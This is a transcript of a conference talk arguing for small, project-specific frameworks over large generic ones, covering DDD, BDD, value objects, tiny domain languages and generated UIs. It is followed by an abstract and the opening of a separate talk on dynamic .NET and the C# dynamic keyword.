Maybe I know best what tool I need for this specific situation — why shouldn't I build it myself instead? So now I think what we are seeing is more of very, very small, tiny frameworks being built, maybe for a certain project, from time to time. They're not even shared; they're not even used as binaries; they're used only as code, from project to project. That's what we're going to focus on today, and I'm going to give you a few examples of that, which might inspire someone to do some new experiments in that area. OK, so, a few more examples though from where we came from. The first era, with the big vendor — kind of a lock-in situation. What I remember mostly from that time was that we were using lots of wizards, and that was supposed to be a good thing. I listened to so many demonstrations where the guy showing something said: all this without writing a single line of code — and that was a good thing, he meant. And when you looked at the code that was actually created, that was your problem. It was horrible. It wasn't tears of joy that came out when looking at that; it was something else. Then maybe a bit later there was the DataSets thing, which influenced us a lot and also caused a lot of trouble. Drag-till-you-drop was very much of that time. Web Forms is one of the frameworks I remember the most — I actually never got that framework. Sorry, Web Forms. I thought for a long time there was something wrong with me, but I've heard lots of people say similar things afterwards. I had my personal record in number of layers in a typical project during this time: at least eleven layers, I think it was thirteen in some project. I thought that was just the best — the more layers the better. I recently heard someone saying that architecture is like lasagna: the more layers, the better. I think that's just so incorrect. Do you think the taste of lasagna is in the number of layers? That's just wrong. The metaphor is wrong; the architecture idea is wrong. I think I learned that the hard way, because I'm still supporting some of those horrible systems of mine that I created 20, or at least 15, years ago, and a tiny little change the user wants quite often ends up forcing me to make changes in at least 90% of those layers. The ripple effects are horrible all the time, and it doesn't actually help me much. We'll come back to this. So I only pay, without any gain, actually. The second era was when we were using many large generic open source frameworks. I first started out trying to create my own generic framework that would actually solve all problems. It was even called Valhalla, which is the place where the gods live in Norse mythology, so it was just perfect — it was supposed to do it all. And as you can guess, it turned out to be a mess and a crash. The good thing, though, was that I learned a lot from it, so it wasn't a waste of time, but it didn't turn out as I wanted it to. Not at all. So during this time I learned that maybe frameworks aren't invented; quite often it's better to harvest them, as someone wisely said. So instead of creating my own stuff, I started using other frameworks, quite a lot. Something I focused a lot on back then, and still do, is to think about the value of what we are creating. We are doing it for some reason, and that value is business value — or it comes back to money at some point. And as technical people, quite often we don't care a lot about that.
But the good news is that we actually create value for someone by creating great code, because if we have created great code, we can make that change the business people want — the one that will earn some more millions — very quickly, with very low risk, and in a safe manner. If the code is really bad, you might have seen code bases that you actually can't change or touch and have to work around. Have you seen that? Some of you, yeah. If you have that situation, it's the opposite: that code base isn't valuable; it can't create value at all, it's just on a death route, so to say. So the next question is: how do we create that great code base for achieving a lot of value? Lots of things come to mind, and perhaps the most important are domain-driven design and test-driven development. I think they helped me a lot and are still helping me a lot in creating better code. And a lot of other things too, of course — there isn't only one thing that's the moral of the story; it's a combination of different things. But if I could only choose one way of achieving great code, do you know which one that would be? You can only pick one. Sorry? DDD — that's a good guess. Yeah, more guesses. Simplicity — someone read the abstract, I guess, but that's not what I'm aiming for or asking about. One more guess, only one. You are about to start a new project; you can only pick one thing. Be aware — you learned that from the previous session. Great. Actually, if I can only pick one thing, I would go for the best people, the best colleagues I can possibly find. Because with the greatest developers, it doesn't really matter how they work — Scrum or not is almost irrelevant; it turns out well anyway, sooner or later. Do you share that picture? Of course, even the best can become even better by applying better tools and things like that, by being more aware — of course. But it's just such a relief to work with such people, so I think that's actually the single most important thing to pick. Looking at just one aspect of my typical applications — the layering — I started out saying that earlier on I had maybe eleven layers in the average project; I'm now down to about five, which seems like a better fit. And we'll see when we move on that it goes down even further.
So before going into the tiny stuff, just a few words about BDD and DDD. Also, first BDD. Something that is not what you've heard 1000 times before, I hope at least, but BDD is that it helps out very, very much, I think, with providing a red thread through your development. You come up with your scenarios in BDD style. Those scenarios, when you convert them into test cases, they will tell you what units you need to have. So let's have a look at that. I have some step definitions here for a scenario regarding, sorry. Let's have a look at the scenario first. I guess many of you have seen 100 examples of BDD before, but just a quick one here. The happy case for registering customers, sorry, projects. Given I have a customer called Finner, when project phone app is added for Finner with a certain activity and consultant, then phone app is ready to get time registrations. In reality, this works out gracefully when you do this in collaboration with the client, the business expert. Normally, I end up writing this word and the discussions start going. No, we don't say that or what do you mean now? It just works out extremely well, surprisingly well. But when we turn this into a test case, we can start by doing what I think of as wishful programming. What about if I had a customer class? What if I had a project class? And think about it freely. We don't have anything yet. We only have a requirement, a piece of requirement here. So we go from there and go for what we would like to have now. And after a while, when we have sketched this a little bit, this actually tells us what unit tests do we need. Obviously, we need to create the customer class. Let's drive that development with the unit, start with the unit test and go from there. And that unit test will tell you what real code to write. So it all starts out from the top and just sprinkles out. And if you follow that route, that those old questions on what test should I write and where to start and they just goes away. Så I think this is actually something that helps out tremendously. So that was just a few words about BDD. Domain driven design, something I'm very fond of. I've been talking about that for a long time and writing about it and yeah, using it. But every now and then someone has asked me, well, you may have heard you talk about DDD, but I don't really get it. What is it really? And I've been very puzzled about that question. I haven't been prepared for it, totally surprised. Så I've said something like, well, yeah, DDD, it's like love or harmony or balance or peace. Most people don't find that too helpful. So I was quite or not only quite. I was very happy when Eric Evans, who wrote the first, who wrote the DDD book, came up with the following proposal for a description of DDD, what it is. First, he wrote that domain driven design is an approach to the development of complex software in which we, and we are going to do a different thing, a few things here, but I just want to point out complex software here. This tool is for dealing with complexity. So you probably won't gain as much from it. If the project is very simple and you can just do it with a red tool or something like that. That said, when you get started on working in a DDD fashion, I think quite often you just go with that style. I do that actually for most situations. I have found out that I have a tendency of believing that every project is quite simple when I start with them. And then it takes like a week and then I realize maybe that wasn't so simple after all. 
One month later, my hair starts going away again after all the thinking, and it turns out to be so complex every time. It's really hard. Do you see that as well? Maybe not always, but most often things are harder than they first seem when you get into the details. So maybe it's not a waste of time going with DDD, I guess. So what do we do with DDD? Well, first of all, focus on the core domain. I think that's a very good piece of advice for not ending up in the situation of believing you can take care of every system at the company, renovating them all into perfect shape with the DDD style and different bounded contexts and everything. That will never happen. You won't find the people for that. You won't find the time for that. Of course you should put all the effort where the money is to be made instead, where you have your competitive advantage. That's a good place to spend your time. Eric actually says to clients that he doesn't care what he is working on, as long as it's the most important thing for the client. I think that's a very good thing to have in mind. Second thing: explore models in a creative collaboration of domain practitioners and software practitioners. That means that we as developers probably can't understand enough or create the best model on our own. We need to collaborate with the people who know the most about the problem. At the same time, the business people, yeah, they are just not trained the same way as we are for creating software, so they can't do it on their own either. We need to collaborate. This is a perfect situation where one plus one turns into three, I think. It often takes some time. It doesn't happen on day one, but over time this is extremely powerful, in my opinion. So you have to try it if you haven't before. And finally, we should speak a ubiquitous language within an explicitly bounded context. And the idea here is that if we share the language, we are quite a lot better at communicating with each other. It's obvious, of course, but still, I think most projects are sloppy with this. So if we share that language, we do ourselves a favor if we realize that that shared, strict, crisp language holds within a very strict bounded context. It doesn't go everywhere. The word customer means so many different things at a large company, depending on what department you are in. You can't expect it to have the same strict definition everywhere, but within your subsystem, your bounded context, you can, and you should protect the definition that you have come up with together with the business people. As you notice here, there are no words about entities or repositories, for example, and I think quite a lot of people believe that is what DDD is all about. But that's actually not very core to domain driven design at all. Those are only tactical patterns for dealing with it on a lower level, so to say. This is more at the core of domain driven design. That said, I'd like to talk about one of those tactical patterns a little bit, to provide another description of what domain driven design is, because I think this pattern is still tremendously underutilized in most applications. I think Martin Fowler once said, well, object orientation is great, the only problem is that nobody uses it, something like that. And to me that comes down to value objects. If you program in an object oriented fashion, you will fall in love with those. So the idea here is that when you find a little concept when you talk to your client, that little concept probably should make it into an object of its own.
You put a name on that concept and you have it in your code forever, and it typically encapsulates some behavior as well, to be really interesting. What I tried to show in this little model here was that, many years ago, I evaluated Microsoft's first OR mapper. I don't even remember what it was called. Anyone? SQL something? No, the one after that, after ObjectSpaces. I don't count those early attempts, they were never released. This was the first released OR mapper from Microsoft. LINQ to SQL, thank you. I'm getting old, I guess, my memory is leaving me. So I was having a look at LINQ to SQL to see if it was a good thing for me in a certain project. This little model here is actually just a toy model of a video rental. So a rental has rental lines, and there is a price object carrying only one field and some behavior, and the price object is used by rental and rental line and film title, and price has another object called discount, which also carries some behavior for that concept. Nothing strange from an object perspective, but from a database perspective you can't just model it like this; if this is a relational database, the DBA will probably go nuts on you. So this is not okay. Unfortunately, LINQ to SQL didn't support value objects at all. So this was what turned up in your database if you tried to do this without doing some hacks. So I guess most people just skipped the concept of value objects and went with entities only. But again, from an object perspective, this is the way to do it. It's just totally wrong from a relational perspective. So I think value objects are a very good way of getting away from the relational model in your C# code base. Maybe this is a clearer, or more interesting, way of describing value objects. I've written a little piece of code here, and please excuse me for some Swedish here, I actually have a point with that, but it's about eggs. The Ä, the A with the dots on it, is an E in English, so you might understand it. So Stina has obviously seven times 12 eggs and Pelle has three times 20 eggs. And we put all those eggs in a basket and we check that we have the correct result. Could it be simpler than this? Probably not, it's very simple, but there are some interesting concepts hidden here. And maybe those concepts would be interesting in a larger situation. I think so. Anyone? Sorry? Egg ownership. Well, yeah, maybe, please continue, in what way? A good point. The ownership of the eggs disappears when they go into the basket. I totally agree. That's not what I was looking for, but that was a good idea. More. Some concepts from the egg domain. Any egg developer in here? No. Sorry? Yeah, good. Yeah, good. That's what I'm after. I'm not sure what 20 is called in English, but in Swedish it's called tjog, and 12 is dussin, a dozen. What is 20 called? Do you know? Those concepts, they are old. We don't use them much any longer, but in the egg domain, the egg domain experts say them all the time. Why not use those concepts? They might help us out. So I try to rewrite this tiny little piece of code in a different way by using a value object, and I chose to call that value object Antal. Or what would it be in English? Number, maybe? So I'm having a couple of static methods on the Antal object, called Dussin and Tjog: Dussin of seven and Tjog of three, which tell me a little bit more about what is going on here. But more important, maybe, is that I'm not returning ints any longer.
I'm returning an Antal object, storing that in Stina's eggs and Pelle's eggs. I don't know what the native format in memory is here, and I don't care, because later on I'm doing an addition and then I'm asking: please give me the eggs as, it was a really bad idea doing this in Swedish, I realize now, I ask for them in another measure, another metric, than dussin or tjog. And there might be a tiny little rule hidden here. What if I asked for the number of eggs in dussin and it didn't come out even, it might have become a float. How should I round that? I don't know. It doesn't matter, but that decision goes in one place in the whole system instead of being spread out everywhere. That's extremely powerful in real applications. So the more you start using those, the more power you get from them, actually. Someone recently told me that in the typical application there are like seven places where you validate social security numbers. That would never happen if you do it like this. It's in one class. You don't have that piece of code everywhere in different variations. Of course not. So I see the domain model of my applications very much as the core of the application. That's where I try to put the most interesting stuff. But at the core of the domain model, I have my value objects. They are carrying the most interesting pieces of the domain model. That's how important I believe those are. So let's move over to tiny. I think value objects actually have a very important part in this story as well, but we'll go a little bit more extreme, I guess. First, trying to motivate why this is important. I once asked Martin Fowler about metaphor, because I didn't understand extreme programming many years ago. I said, I live in Sweden and I have a little boat in Sweden. We have like two sunny days each year. And I said, I understand extreme programming: I shouldn't prepare anything, so when I go out and see sun, I go and prepare my boat then, because I know I can use it. Unfortunately, it takes a day, and tomorrow it's not going to be sunny any longer. So I asked Martin, how shall I think about this? Martin just said, I don't like metaphors. That wasn't the answer I expected. And now I think I understand totally what he means by that, because I also have a tendency to dislike metaphors. They break down all the time. But I can't stop trying to use them anyway. So I tried it again. This is the symbol of a framework, a really, really competent, big framework. Like the one I failed to create. But there are such frameworks that have been created. This will probably be able to do kind of like anything. So wouldn't this be great to have for every new situation that I don't know about at this point? It should be able to solve it all. I think I've been thinking like that in the past. I've totally changed my mind. I'd hate a tool like that. That's horrible, awful. I wouldn't like to touch it at all, because it's probably not good at anything. And for example, if I come to a situation where this is actually the tool I want to have, because I'm going to cut high grass. I don't know the name of this in English. Anyone? Sorry? A scythe. A scythe, okay. Anyway, you know what it is. That is so perfect for the task. And the other tool is so horrible. It doesn't even deal with the situation, even though it has some kind of similarity. Yeah, it's a knife of sorts, but it doesn't work out in that situation.
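Going back to the egg example for a moment, here is a minimal sketch of what an Antal-style value object could look like in C#. The names Antal, Dussin, Tjog and InDussin are guesses at the spirit of the demo, not the actual code from the talk.

using System;

public sealed class Antal
{
    private readonly int _pieces;                  // the internal representation stays hidden
    private Antal(int pieces) => _pieces = pieces;

    public static Antal Dussin(int count) => new Antal(count * 12);  // dozens
    public static Antal Tjog(int count) => new Antal(count * 20);    // scores

    public static Antal operator +(Antal left, Antal right) => new Antal(left._pieces + right._pieces);

    public int InPieces => _pieces;

    // The rounding rule lives in exactly one place in the whole system.
    public int InDussin => (int)Math.Round(_pieces / 12.0);
}

// Usage, mirroring the egg example:
// var basket = Antal.Dussin(7) + Antal.Tjog(3);
// Console.WriteLine(basket.InPieces);   // 144

The point is the same as with the social security number: the domain concept, its conversions and its rounding rule live in one class instead of being scattered in seven places.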
And I think that's the case over and over again with those horribly large frameworks that we have been using in the past. I don't know about you, but when I think about my worst experiences of the last five, ten years, I come up with a couple of old frameworks that worked out not so nicely. Not that they were bad. They were very good in some situations, but they weren't good at all in other situations. BizTalk, for example, is one of those favorite examples, probably a very good product and nice in some situations. It doesn't fit perfectly in all situations, of course not, but we've had a tendency of saying, well, let's go for one way that fits them all, or something like that. Just please. What about .NET itself? That's a great question. I'm saying here to watch out for big frameworks. Actually, I have two answers. The first answer is that I'm not against using big frameworks. You can use them as they are if they are a good fit for you. So no problem at all. Actually, there are some problems still, of course, but that might be the best solution for you. It might also be a good solution to build something tiny on top of that big generic framework, and you're just fine as well. You skip loads of work because it's taken care of for you, and you are programming against a tiny piece on top. I think of .NET maybe not as one of those frameworks, more like the base we are working on. It's not always the right base for us. It's quite often very nice, but every so often I would go with another one as well. So a bit of a fuzzy answer to that question. I think I was expecting that question, but thank you for asking it. So what it all comes down to, why I think this tiny thing might be interesting, is that at the end of the day, as I said before, it comes down to cost and value. What is the most, yeah, money-wise decision for what to choose in a certain situation? And the test I'm using in those situations, when I'm about to participate in such a choice, is to think about what I would do if it was my own money. Then you become a little bit more careful, not so sloppy with tossing millions around. What would I do? I think James, the presenter of the previous session, said it very well: quite often it is very nice to start out small and go from there, and maybe switch or shift to the perfect fit of a framework when you see that happen, but start out without going for the big thing, because that is just so risky. All of this is of course only interesting, and I take this a little bit for granted, if we need to make changes in our applications in the future. For something that is just stable, that you haven't touched for two years, you wouldn't care too much about how it looks or anything. But most things we are dealing with that are important have a strong tendency of needing changes all the time. So I think it comes back to being important for very many situations. A few more models here, which are my favorite models for describing this basic software economy. When complexity increases, something else decreases. Do you know what? Probably lots of things, but what comes to mind? Sorry? Effectiveness, very close to what I have here. I wrote productivity. I think this is quite intuitive to most people, and it doesn't go just for software, of course. But what is more interesting here is that the complexity might not actually be real complexity, or essential complexity.
It might be complexity that we just took on, or that we added for some reason. The typical example is of course one of those large frameworks that I mentioned before, where we are only using a tiny little bit of it, but we need to understand quite a lot of it to be able to use it in a good way. Other examples are that we are not valuing YAGNI. We are doing stuff in case it might be good at some point, so we are doing it beforehand. I've been doing that so much in the past. Sometimes those guesses turn out quite well, but at least I've had a tendency of forgetting all those situations when I didn't make a good guess, when I didn't actually get any value at all from all the cost and all the heavy lifting I had to do. So I said before that I thought it was about having code in control, but I've changed my mind. It's also very important to have a good look at the size of the code. It's extremely important, because I think that large code bases actually drive several things. For example, they drive cost. The larger the code base, the more it will cost to maintain, the more bugs it will have, the longer time it will take to make changes. It has a tendency of running slower as well. The quickest code of all is the non-existing code. It's extremely fast, actually. So going from there, adding very little, you will get the quickest, fastest, of course. If you can't touch a code base because it's so large, it will get lots of bugs when you change it. All of a sudden you have fear coming with that, and slowness in decisions. And typically you will end up with a bigger team. Let's add a few more people so we can get something going here. What happens when you have a bigger team? Have you seen that? More mess. Messier. So when you add people, everything goes slower. Yes, absolutely. The comment was that it depends on the situation, basically. How big was the team? Probably also who those people were that were added, of course. But it's kind of a rule of thumb. I think Brooks wrote it like 35 years ago, a formula for how much slower, how much more delayed, a project will be if you add one more person. And we seem to forget that over and over again. And actually, by having a bigger team, you will get a larger code base. It's a rule of nature, because people want to do a good job. Of course they add stuff and, yeah, it just grows. So we end up in this horrible bad spiral going downwards, because a large code base drives cost, bugs and so on and so forth. So this is just horrible. We don't want to be here. Size is extremely important. Final model here. This is from a book by Barry Boehm, around 1980. He wrote about how the cost of taking out a bug changes over time. And he basically said that a bug found early on is cheap, and the cost of taking it away grows exponentially over time. Sounds quite natural. And I think the whole software world still believes in this model. And it's not just about that. To most people it now means: well, what we don't decide today will hurt us later. That's the meaning of it. So let's decide everything today. Let's take wise decisions. Kent Beck wrote in his first XP book that maybe we don't have to have that model. Maybe if we think a little bit differently, we can have this curve instead. Not saying that the cost will grow exponentially, but that, yeah, it will level out. So we need to work differently. But we also get to work differently, we are able to work differently, because of this situation.
We don't have to decide when we don't know anything about it. Early in a project, we don't know a lot about anything, basically. But we learn every day. So we should try to move the decision to a point where we know enough to take it. That just changes everything. But I don't think that many people actually believe in the second curve. Can we really have that? I don't think that's realistic to most people. I think it is. But it's not going to happen automatically. It takes lots of work, of course, and focus on details and everything. So, a few observations I've made regarding tiny as a little trend, maybe. The first one was a few years ago, when we came up with a concept called CCC, because we needed a cool abbreviation. It meant Chunk Cloud Computing. It doesn't matter. The important thing was that one guy who came up with the idea said that maybe we have done the whole business a disservice by trying to force people to go DDD and TDD. In a certain group of people, there are some who would like that style. There are others who wouldn't. They prefer another style of development and they are super efficient in doing their style. Why on earth should we force them to go our style? It makes perfect sense to me, actually. I've been one of those forcing guys, failing with that several times. But as long as we encapsulate the different teams with a clear, crisp boundary, so we don't interfere with each other, it's totally up to each group how they develop. In the group where I am, I prefer having people who would like to do it in a DDD way, because I find that to be very productive. But how they are doing it over there, I don't care. If we are doing it in smaller chunks, the idea is that if it turns out badly, and we later find out that we actually needed those automated tests that we didn't create, we can just scrap the whole thing and start all over again. That was at least the idea. It sounds horrible to some people, but I think it's a quite nice idea, actually. I was recently at the DDD summit, where we had a discussion about what good design is. I don't think we came up with the perfect definition at all, but to many people in the group, it seemed that tiny was a good property of good design. At GOTO this autumn, I talked about something similar to this, about going for smaller things. To my surprise, I was listening to three other talks saying more or less the same thing in totally different ways. And yeah, I thought maybe this is a trend, actually. Then it happened here again today. The presentation before me talked about micro frameworks the whole time, with the same arguments that I'm making. So I'm kind of arguing now that just because others are saying the same thing, it must be correct. That's a quite weak argument, I guess. But it's an observation. And I like this quote: perfection is achieved not when there is nothing more to add, but when there is nothing left to take away. I think that fits quite well with what I'm aiming for. I'm not at all expecting to reach perfection, ever, but at least I think it's a nice thing to strive for. So, a few examples regarding tiny. First of all, from my layering history, this is quite typical layering here. But this is quite moderate, I would say, because I typically had several layers in the UI as well, of course. And the database, of course, we need layers there too: public sprocs, private sprocs, views. All of a sudden we are up to 10, 11, 12, 13 layers. So lots of protection between the user interface and the database. That was the idea.
And then I was sending traveling record sets all the way through all those layers without checking anything. A totally dangerous thing to do, of course, exposing the database schema perfectly to the user interface. Ironically, I didn't trust tools and things for doing the data access. I did that by hand, and I spent lots of time on that. When I came to the entities layer, I never had any time left, so I just wrote a placeholder comment there saying, someday I will add stuff here. So that was how I built most of my applications. It's actually much worse than this. It's also the case that there are different model representations in several of those different layers. Of course, in the relational database there is one model that I have to do some mapping on to get into another model. Quite often I actually didn't use it, but some people recommended having a storage model in objects that was different from the domain model objects. And then you have your DTOs, of course, going over the network. And in the client, you have your view model. All those different models mean what? Sorry? Plumbing, latency, yeah, definitely. We have to add loads of mapping between all of those. Loads of uninteresting code that has to be written. Actually, I don't think that's a good idea. Now I go for this layering instead, as a starting point at least: I've put my focus on my domain model, and that's it. Maybe someone says, well, maybe we would like to store it. Well, yeah, why not, I say, and I can serialize my domain model to storage as one way of doing it. Or maybe they want to have it stored in another way, and I just go for that. Someone else wants to have a little look at the domain model from a user interface. Hopefully, we can render the domain model in a declarative way. We don't have to write code for it, or if we do, we just add what we need. We don't put a lot of focus on starting out large with all those layers that might be good to have, of course not. Instead, we add as we go, and as little as possible. What also happens is that when we don't have all those layers, we have a tendency of going with several of these instead: several bounded contexts that live in isolation. I don't care how each of them is layered. That doesn't matter to me. Another example: tiny languages, actually two of them. Extremely naive examples here, but hopefully they can provide some inspiration for something. The idea here is that we can provide a language for domain experts that they can read. So they don't have to go with documentation or anything like that. They actually read the program instead. The difference is that the documentation is the program. It executes. The normal wisdom here is that we can't expect domain experts to write as well. But actually I find that to be untrue each and every time I try this technique out. They are not dumb. They can learn to do that easily. Actually, it goes automatically, at least if we provide them with an example that they can extend. It's so easy for them. So, two small examples. First, this is a little workflow example. I had this written by a colleague of mine for a demo several years ago with a new client of ours. They were a bit reluctant to go with it. They only had a CRUD interface for something, and I said maybe that's a typical workflow, why don't you go for that? They were really reluctant because it was so complex. I said I can show you how it can be done in three hours for a simple starting point. We did so. We showed this.
They have a little language over here. Every leading blank means one level down. If we change it here, we can try it out and see how the graph changes. Quite simple. We can execute the workflow. Again, it's extremely simple, of course. I can say, this node, I'm done here, and then the next node lights up as not started. I showed that to the architect and the domain expert. What happened was a total surprise to me. The architect didn't like this at all. He just kept asking me what it was. What is it? How does it execute? I was probably a bit irritating, because I just kept asking him what he wanted it to be. That didn't help our discussion. Meanwhile, we talked about this for an hour or two, and the business guy, who was used to sitting in Visio and drawing those graphs, started playing with it and found out, well, this is extremely much faster to draw than with my Visio. He didn't need a two hour training course to learn how to do this. It was just an idea for how it could be done. Actually, we've been working with them ever since, but they totally disliked this. It was just a demo. The second example, though, is in production. Also a tiny little language that is exposed to the business experts. This was on top of a quite competent batch system that they have been using for a while. Twice a year they have some large executions, and during the year they have loads of smaller ones. This is for a large one, which used to take a Word document of 35 pages of instructions for what should be done every day. We tried to codify that. The language, I have to confess, is quite ugly. Once again, it was very easy for them to write this on their own. They didn't find it hard at all. Actually, it wasn't even a discussion. They just started doing it. It was so much simpler than the Word document, and then they just click create, and they can run this and try it out, because it turns into a form. We are going to have a look at that in a minute. Quite often we can move a task to the people who know the most about it, and who want to make changes to it, by just giving them a language and creating a runtime model for that, a runtime environment for that language. It's quite easy. It has been done for many years, but I don't think it's been done enough. I think there is much more value to gain from that. The second family of examples from me is using a declarative UI. I have found that the UI matters a lot. Of course, we all know that. It's also extremely efficient for our discussions with the business users to be able to show them a user interface immediately, right after we have sketched something, and have just shown them a UI. They ask different questions than they would if we had just shown them other representations, like the model or the scenarios. We have to move between different representations with the users, because that is what the discussion needs. It also tends to be the case that a lot of the code in the system ends up in the user interface. I see that over and over again. It's quite hard work, and it's intertwined with other code, like when we need a refresh of this little part. If we go about it differently, it doesn't have to be so hard; we can often just generate a user interface from some classes. This is a user interface that was generated from the classes we just saw a moment ago. Now they can, without that Word document, do this and this and this, and they can follow a part of the process and see how far they have come in the job.
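As a side note on the first tiny-language example above, where each extra leading blank means one level down, here is a minimal sketch of how such an indentation-based format could be parsed into nodes. The names are invented; the real demo's code isn't shown in the talk.

using System;
using System.Collections.Generic;
using System.Linq;

public class WorkflowNode
{
    public string Name { get; set; }
    public List<WorkflowNode> Children { get; } = new List<WorkflowNode>();
}

public static class TinyWorkflowParser
{
    public static WorkflowNode Parse(string script)
    {
        var root = new WorkflowNode { Name = "workflow" };
        var stack = new Stack<(int Level, WorkflowNode Node)>();
        stack.Push((-1, root));

        foreach (var line in script.Split('\n').Where(l => l.Trim().Length > 0))
        {
            int level = line.TakeWhile(char.IsWhiteSpace).Count();   // leading blanks = nesting depth
            var node = new WorkflowNode { Name = line.Trim() };

            while (stack.Peek().Level >= level) stack.Pop();         // climb back up to the right parent
            stack.Peek().Node.Children.Add(node);                    // attach under that parent
            stack.Push((level, node));
        }
        return root;
    }
}

Once the script is a tree of nodes like this, rendering it as a graph, or walking it to execute the workflow, is a small step, which is the whole appeal of giving the domain experts a tiny language plus a runtime for it.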
And they can start different tasks in the system. It's not a beautiful user interface at all; that's not my point. The point is just that we don't have to create it manually. We can quite often generate at least a part of it. And it gets much better than this. We have a framework for generating a rich JavaScript front end on top of REST services, where we also use some metadata from the services. That's a really interesting idea, I think, with a lot of potential for the future. We can't just take a big, complex problem, cut it into lots of small problems, and expect all the complexity to go away; we usually find that the complexity then shows up between them instead. It just moves somewhere else. My point here, when talking about tiny, is not just to split up a big problem, but to take away as much of the problem as possible. It often starts out, and I think you have seen this, like when I tried to create my own OR mapper: it looks so nice and small, but it has a tendency to grow and grow. We have to be careful about going down that route. And to many people this sounds scary: it's home-grown code, it's hard to understand. I mostly don't think that's true. Even if it might be a little hard here and there, when it's that small you can get your head around it. The final example is about storage. That's something I have spent a lot of time on during my whole career. This little framework is about creating an aggregate store: storing a part of the domain model, from the aggregate root and down, in one go, without splitting it up into a relational model. Because not every problem is relational, actually not that many, I would say. Many times, if you work in a DDD style, the relational model will hurt you, I would say. At the same time, most places go for Oracle or a SQL Server. It's just a given; you have to use it. Well, maybe not necessarily. This little framework just takes the aggregate and stores it in the relational database, so you have no problems on the operations side. For going into production, that has been a good fit for many situations. What you get from it is that lots of code just goes away. You have true aggregates in the database, not just in your domain model. You can have a global database where everyone could work against it from the side, but they have to go through your code, so to say. And for certain problems, the performance is actually better than using the relational model the ordinary way. We don't have time to go deeper into that; we are just about to end this talk. A couple of principles that I tried to distill from these examples. First of all, for me, context is more important than best practice. Best practice is one of those phrases that rings a little alarm bell in my head; I'm a bit suspicious of best practices. Tiny languages and runtime models are a fantastically effective way of getting the effect of a lot of code out of a very small amount of code, and they can be used for much more than they have been used for so far. It's very much about not overdoing things and not building what you don't need, and maybe taking those concepts a little further. The tiny little frameworks that you have written yourself are going to be opinionated, and that's a good thing. You have written them for a certain purpose, so why not use that? That's an advantage for you. I don't care much about reusing binaries; I just paste the code directly into my project. It will live with that project and it will be changed with that project. And then, if you have to standardize on something, standardizing on small protocols like REST is a good idea. It's an advantage to focus on HTTP, which seems to be a protocol that works on the web.
We can use it in the enterprise too. We don't have to go with some bigger standard for the whole company, because that doesn't really work anyway. So, combined with trying to go small all the time, it gives you an advantage when making changes in the future. I think it's simply an advantage. And if you get the comment that there's a problem with this tiny thing of yours, that it isn't enterprisey enough, that's a good sign. Then you have done something right. That was the end of my talk. Thank you for listening. Thank you.
|
A few decades ago, many developers in the industry often listened to a single big vendor and followed all their advice and lived in their world. Then came the era of using large open source frameworks and moving into that mindset and community. TDD, DDD, XP and so on were important and strong influencers. We still stand on the shoulders of those influences when moving to the next era, the era of tiny. But a lot is also changing. In this presentation we will talk about the motivations for the new era and give lots of examples of how it manifests and what it will mean to you!
|
10.5446/50978 (DOI)
|
All right. So I hope everyone's here to learn about dynamic .NET. Hope you had a good lunch. Hope you're having a good conference. All that stuff. So, hi, I'm Keith. We're going to talk about dynamic .NET. So just a little about me. I'm from Iowa. That's in the middle of nowhere. I sell motorcycle parts at JPcycles.com. I work on an open source project called posh-git. I'm talking about Git in two hours, if you're at all interested in that. It should be a fun time. I blog at Los Techies. I'm a C# MVP. Yeah. So that's me. So this talk is not going to be about the static versus dynamic debate. We're not going to debate the finer merits of Python and Ruby against C# and Java and all that fun stuff. We're not going to talk specifically about the Iron languages. We're not going to talk about all the fun tricks you can do with IronPython, all the fun tricks you can do with IronRuby. And we're not going to talk about how to build your own Iron language; those get into internals we just don't have time for today. What we are going to talk about is what the DLR is, how dynamic works in C#, and then some interesting use cases. All the code is on GitHub if you want to follow along, dahlbyk slash presentations. Let's go. So dynamic .NET has been around for a while now. When they first announced it, there was all sorts of controversy. This links to a particular post that amused me. Hallmarks of a great statically typed language, certainly. Less and less robust because of all these shortcuts. The disaster started with var. So clearly somebody doesn't understand var. I like the last one the best. Not to save you from yourself, but to save you from incompetent coworkers. This is a very encouraging thought. So I obviously wouldn't be coming and talking to you today if I didn't believe there was some merit. And to believe that C# is 100% strongly typed and statically checked and everything is just silly. All over the place we've got these magic strings that reference something dynamic, something that we don't know at compile time. So when we're pulling something out of a data record, we have to know what type it is, what the column name is. Pulling something out of XML, we have to know the type of the thing that it is. If it's the wrong type, if we try and cast "A" to an integer, assuming we're not doing hex, then we're getting an error at runtime. Similarly when we're sticking stuff in view data and using these magic strings to pull stuff back out. All of these are dynamic behaviors that we've got inside our nice little happy statically typed world. So wouldn't it be nicer to be able to do this kind of stuff instead? Have it actually read like code? To not have to do explicit casting from here to there? That's the sort of stuff that dynamic is going to allow us to do. It's not always the right tool for the job, but when you already have dynamic behavior in your app, if we can turn it into something that reads more like code, but captures that same behavior, I think there's value in that. So when we're looking at dynamic .NET, there are kind of three tiers. At the top tier, we've got the languages. Those are the languages that support the dynamic language runtime. Now those talk through the DLR sitting in the middle, which provides essentially the foundations for this dynamic behavior. And then at the bottom level, we've got the different objects that we're talking to. I mean, ultimately, .NET languages are about making objects talk to each other.
And so those objects might have standard CLR behavior. They might be COM objects. They might be JavaScript objects in Silverlight. They might be dynamic language objects from Python or Ruby. And of course, you can build your own as well. So the DLR kind of sits in the middle. But first let's talk about languages. So IronPython and IronRuby have been around for a while. They started in Microsoft, I believe, and they have since been pushed out of Microsoft, and they're now open source and left to the community. Ultimately, if we want dynamic languages on .NET, and you can see from the JVM community that there's certainly value in having a strong JRuby and a strong Jython, that kind of thing, if we want those as a community, we're going to have to push those forward. So those are the Iron languages, and they're all built on the DLR, which shipped with .NET 4. Previously, they were running on their own dynamic language implementation. VB has actually had dynamic behavior since .NET started. All you have to do is turn Option Strict off, and now you've got access to late binding. But since VB 10.0, which is what shipped with Visual Studio 2010, it uses the DLR behind the scenes. And then finally, C# in version 4 added the dynamic keyword to expose the same behavior that you can access through VB. So let's talk a little bit about C# dynamic. Does anyone here not read C#? Good. Is anyone here a VB developer that prefers C#? Is there anyone that's a VB developer that does not prefer C#? All right, I have yet to meet one. Okay, so C# dynamic. So with dynamic, there's always an implicit cast from some CLR type, like a string, to dynamic. You can always just take something static and treat it dynamically. So if you had a method that takes in dynamic, you can always pass in a normal static .NET object. You can also implicitly go from dynamic back to a CLR type. Now, of course, that depends on the dynamic being able to be cast and converted to that type. We can always say, all right, we've got our dynamic foo. Now let's assign that to a string, baz. And of course, this will work because we know that foo is a string. And finally, any expression involving dynamic is itself dynamic. So if we were to just let the compiler figure out what type quux is, well, we've got foo and we've got baz. Well, foo is dynamic. Therefore, the expression is bound dynamically, and then quux is going to be treated dynamically 